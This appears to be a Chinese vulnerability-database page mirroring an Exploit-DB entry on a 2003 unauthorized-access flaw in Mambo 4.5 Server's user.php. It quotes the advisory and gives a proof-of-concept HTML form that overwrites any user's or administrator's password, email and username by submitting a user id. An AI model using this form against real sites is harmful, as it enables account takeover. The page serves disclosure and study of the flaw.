Mambo 4.5 Server – ‘user.php’ Script Unauthorized Access

Mambo 4.5 Server – ‘user.php’ Script Unauthorized Access

漏洞ID 1054292 漏洞类型
发布时间 2003-12-10 更新时间 2003-12-10
图片[1]-Mambo 4.5 Server – ‘user.php’ Script Unauthorized Access-安全小百科CVE编号 N/A
图片[2]-Mambo 4.5 Server – ‘user.php’ Script Unauthorized Access-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23428
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9193/info

It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id.

Mambo Server version 4.5 Beta 1.0.3 has been reported to be vulnerable to this issue, however other versions could be affected as well. 

<html>
<head></head>
<body>
<form action="http://www.example.com/index.php" method="post">
New Name : <inputtype="text" name="name" value=""><br>
New E-mail : <input type="text" name="email" value="" size="30"><br>
New UserName : <input type="text" name="username" value=""><br>
New Password : <input type="password" name="password" value=""><br>
Verfiy New Pass : <input type="password" name="verifyPass"><br>
ID : <input type="text" name="id" value="1"><br>
<input type="hidden" name="option" value="com_user">
<input type="hidden" name="task" value="saveUserEdit">
<input type="submit" name="submit" value="Update"><br>
</form>
</body>
</html>

相关推荐: Internet Junkbuster Proxy Unauthorized Connections Vulnerability

Internet Junkbuster Proxy Unauthorized Connections Vulnerability 漏洞ID 1101161 漏洞类型 Configuration Error 发布时间 2002-12-23 更新时间 2002-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享